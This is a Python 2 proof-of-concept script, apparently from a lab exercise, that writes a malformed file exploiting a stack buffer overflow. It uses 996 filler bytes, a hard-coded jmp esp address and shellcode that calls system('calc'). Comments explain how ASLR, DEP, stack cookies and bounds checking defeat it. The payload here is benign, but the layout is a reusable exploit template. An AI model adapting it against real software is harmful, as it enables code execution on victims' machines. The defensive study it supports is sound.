import struct
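# Proof-of-concept generator for a malformed input file that demonstrates a
# classic stack-based buffer overflow (lab-style: the visible effect is
# launching the calculator).
#
# NOTE: Python 2 only. The script concatenates `str` values with the result
# of struct.pack() and writes them to a binary-mode file, which relies on
# `str` being a byte string.
#
# Defensive reading of the layout built below:
#   * Both addresses are hard-coded absolute values, so the file only has the
#     intended effect where the referenced modules load at exactly these
#     addresses. Address-space layout randomisation (ASLR) removes that
#     assumption.
#   * The machine code sits in the overflowed data itself, directly behind
#     the overwritten address. Data Execution Prevention (DEP/NX) keeps such
#     bytes from running, and stack cookies (/GS) are designed to catch the
#     overwrite before the function returns.
#   * The root cause is in the program that parses the file (presumably an
#     unbounded copy into a fixed-size buffer); length checking there is the
#     real fix.
#   * The long run of 'A' bytes and the literal "aaaabbbbcccc" make the file
#     easy to recognise with a simple content signature.


def p32(x):
    """Return *x* packed as a 4-byte little-endian unsigned integer."""
    return struct.pack('<I', x)


# Hard-coded address inside shell32.dll (per the author's note); the name
# suggests a `jmp esp` instruction -- confirm against the target build.
jesp = 0x7d711020

shellcode = "\x31\xC9"  # xor ecx, ecx
shellcode += "\x51"  # push ecx            (NUL terminator for the string)
shellcode += "\x68\x63\x61\x6C\x63"  # push 0x636c6163     (bytes "calc" in memory)
shellcode += "\x54"  # push esp            (pointer to the string)
shellcode += "\xBA\xC7\x93\xbf\x77"  # mov edx, 0x77bf93c7 (system, per the author)
shellcode += "\xFF\xD2"  # call edx
shellcode += "\x90" * 2  # two NOP bytes as suffix

# 996 filler bytes, the 4-byte address, 12 marker bytes, then the code.
# The 996 offset is specific to the vulnerable buffer and is not derived here.
payload = 'A' * 996 + p32(jesp) + "aaaabbbbcccc" + shellcode

with open("exploit.txt", "wb") as f:
    f.write(payload)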